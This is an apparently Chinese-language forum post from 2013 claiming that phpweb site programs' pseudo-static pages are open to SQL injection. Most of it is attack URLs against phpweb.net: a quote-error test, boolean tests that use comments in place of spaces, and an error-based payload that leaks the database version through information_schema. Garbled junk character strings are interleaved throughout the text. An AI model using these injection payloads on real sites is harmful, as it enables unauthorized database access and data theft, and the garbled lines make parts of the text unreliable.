phpweb所有的整站程序伪静态页面都存在sql注入; h5 |" a M2 o
; y3 r( g. A% H" Q5 J; L
主站:http://phpweb.net/# d% u: y" x a3 z) e5 z: g6 |
加’检测:
( Z& x& b5 Y1 N ?5 E: c& V
) m- P7 X! |$ jhttp://www.phpweb.net/down/html/?772′.html1 p; F L+ \7 Y+ k: B9 S
/ W6 {6 p: X4 d, q! k' q
出错6 i- ^* K$ P+ ]! g2 a8 O$ W. S9 R
存在注入。! o& T- s' }1 ~6 c4 ^4 |7 ~- K
不能用空格,只能用/*罗
1 o% N6 O% Q3 A5 P) U& V& Shttp://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常
6 o, w7 l8 l" e
7 C$ n" [* m/ z7 ~$ q1 ~- n- {http://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.# _1 H& ~1 q1 u* \+ |- U& [# Q
爆数据库版本:
" P: M1 ^ |* \* ~/ Z " r3 X4 ~4 {" q' B
?
7 V/ M s# k5 ] D8 B. A2 H! C9 x$ V. t1 p* Z, X+ M8 r1 ^; E2 G" @1 O
http://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html
0 _8 E1 A) j* C+ r" d更新日期: 2013-01-03 13:39:50
: ^+ U: o5 k+ L( F: V+ @ |